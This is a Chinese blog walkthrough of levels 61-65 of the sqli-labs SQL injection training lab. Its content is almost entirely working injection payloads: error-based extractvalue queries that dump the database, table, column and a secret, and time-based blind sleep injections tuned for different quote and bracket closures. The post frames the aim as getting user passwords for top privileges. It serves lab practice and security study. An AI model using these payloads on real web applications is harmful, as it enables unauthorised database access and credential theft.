sql-lib闖關祕籍之61-65關

下面開始11-20關,之前不會的關卡可以參考我這幾篇文章: sql-lib闖關祕籍之1-10關sql-lib闖關祕籍之11-20關sql-lib闖關祕籍之21-30關, sql-lib闖關祕籍之31-40關 ,sql-lib闖關祕籍之41-50關sql-lib闖關祕籍之51-60關

不管是第幾關,我們的最終目標是獲得用戶密碼,從而獲取最高權限!

以下的學習過程中如果遇到那裏不會的或者不清楚的地方,歡迎大家留言,我將盡力幫助大家~

 馬上就要結束了,親愛的,興奮嗎!!!!!!!!

第六十一關

和六十關基本一樣,就是變成了單引號和雙括號,這好像是第一次遇見雙括號

爆數據庫名   ?id=1'))and extractvalue(1, concat(0x5c, (select database())))%23

 爆表名    ?id=0‘)) union select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e))--+

  爆列名       ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='e01xkjlffi'),0x7e))--+

 爆數據      ?id=-1')) union select extractvalue(1,concat(0x7e,(select group_concat(secret_SUO9) from e01xkjlffi),0x7e))--+

 

 搞定了!   x9UWIAkqAsbxXsjEsFOU9bH5

 

 第六十二關

這關這次聯合注入和報錯注入都不可以了 ,那我們呢用盲注

?id=1%27)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(3))--+

 

 當然,我看見這關還有過腳本的,我不是特別明白,明白了我再補充

 第六十三關

和六十二關基本一樣,唯一區別在於需要使用單引號閉合

?id=0%27and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正確時間短,錯誤時間長

第六十四關

和六十二關基本一樣,唯一區別在於需要使用括號閉合

?id=0))and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=77,0,sleep(10))--+
正確時間短,錯誤時間長

 

 

第六十五關

和六十二關基本一樣,同上,只不過?id=1”) 正確延時

 ?id=1%22)and%20If(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27challenges%27),1,1))=79,0,sleep(10))--+
 

 

 

哦哦哦哦哦哦哦哦哦!!!!!!!~~~~~結束啦!!!!

有任何問題都可以給我留言哈,嘿嘿   @-@

61-65關結束

 

 

該文章有參考了以下的網頁:

 

SQL注入靶場sqli-labs 1-65關全部通關教程

SQLi_Labs通關文檔【1-65關】

 sqli-labs 1-65教程

 [sqli-labs]Less-62(Bool盲注)

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章